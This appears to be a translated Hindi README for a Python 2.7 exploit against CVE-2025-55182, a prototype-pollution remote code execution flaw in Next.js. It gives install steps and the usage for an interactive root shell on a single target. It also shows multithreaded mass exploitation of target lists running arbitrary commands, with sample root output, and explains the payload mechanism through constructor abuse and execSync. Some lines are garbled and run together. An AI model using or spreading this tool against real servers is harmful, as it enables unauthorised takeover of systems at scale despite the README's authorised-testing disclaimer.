
CVE-2025-55182 एक्सप्लॉइट टूल – Next.js प्रोटोटाइप प्रदूषण के माध्यम से RCE की ओर ले जाने वाला Python 2.7 एक्सप्लॉइट
CVE-2025-55182 के लिए एक Python 2.7 एक्सप्लॉइट – Next.js अनुप्रयोगों में एक महत्वपूर्ण प्रोटोटाइप प्रदूषण / RCE भेद्यता।
यह उपकरण एकल-लक्ष्य इंटरैक्टिव शेल और बहु-होस्ट का सामूहिक स्कैनिंग दोनों की अनुमति देता है, जिसमें मल्टीथ्रेडिंग, रंगीन आउटपुट और स्वचालित HTTPS फ़ॉलबैक शामिल है।
https:// जोड़ता हैid को किसी भी कमांड (whoami, ls, आदि) में बदलेंrequests (आसानी से स्थापित करने योग्य)requests लाइब्रेरी – इसे स्थापित करें:
pip install requests
· एक टर्मिनल जो ANSI रंगों का समर्थन करता है (अधिकांश Linux/macOS टर्मिनल, Windows Terminal, PowerShell)
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
स्क्रिप्ट को निष्पादन योग्य बनाएं (वैकल्पिक):
chmod +x CVE-2025-55182.py
python2 CVE-2025-55182.py https://target.com
या प्रोटोकॉल के बिना (HTTPS स्वचालित रूप से जोड़ा जाता है):
python2 CVE-2025-55182.py target.com
एक बार कनेक्ट होने और संवेदनशील सत्यापित होने पर, आपको एक शेल प्रॉम्प्ट मिलता है:
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
अंतर्निर्मित कमांड:
· exit / quit – शेल बंद करें · clear – स्क्रीन साफ़ करें · help – सहायता दिखाएँ
एक फ़ाइल तैयार करें जिसमें प्रति पंक्ति एक लक्ष्य हो (http/https के साथ या बिना):
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
सामूहिक स्कैन चलाएँ (डिफ़ॉल्ट: 10 थ्रेड, कमांड id, आउटपुट res.txt):
python2 CVE-2025-55182.py targets.txt
थ्रेड्स, कमांड, आउटपुट फ़ाइल को अनुकूलित करें:
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
· 20 – थ्रेड्स की संख्या · whoami – प्रत्येक संवेदनशील लक्ष्य पर निष्पादित करने के लिए कमांड · results.txt – आउटपुट फ़ाइल (केवल संवेदनशील प्रविष्टियाँ सहेजी जाती हैं)
सामूहिक स्कैन आउटपुट उदाहरण:
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
Status: 303
Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
सहेजे गए परिणाम (res.txt):
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
एक्सप्लॉइट Next.js एप्लिकेशन (/login जोड़ा जाता है यदि पथ खाली है) के लिए एक नकली मल्टीपार्ट/फ़ॉर्म-डेटा अनुरोध भेजता है। यह child_process.execSync() का उपयोग करके एक सिस्टम कमांड निष्पादित करने वाले दुर्भावनापूर्ण उपसर्ग को इंजेक्ट करने के लिए प्रोटोटाइप प्रदूषण (proto:then और constructor:constructor) का दुरुपयोग करता है।
सर्वर x-action-redirect हेडर (या Location) में कमांड आउटपुट के साथ 303 रीडायरेक्ट के साथ प्रतिक्रिया करता है। उपकरण /login?a= से परिणाम निकालता है।
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई दायित्व नहीं मानता है। इस एक्सप्लॉइट का उपयोग करने से पहले आपके पास लक्ष्य प्रणाली के स्वामी से स्पष्ट लिखित अनुमति होनी चाहिए।
अधिक अस्वीकरण आप Jenderal92 के कवर पर देख सकते हैं। आप इसे यहाँ !!! देख सकते हैं।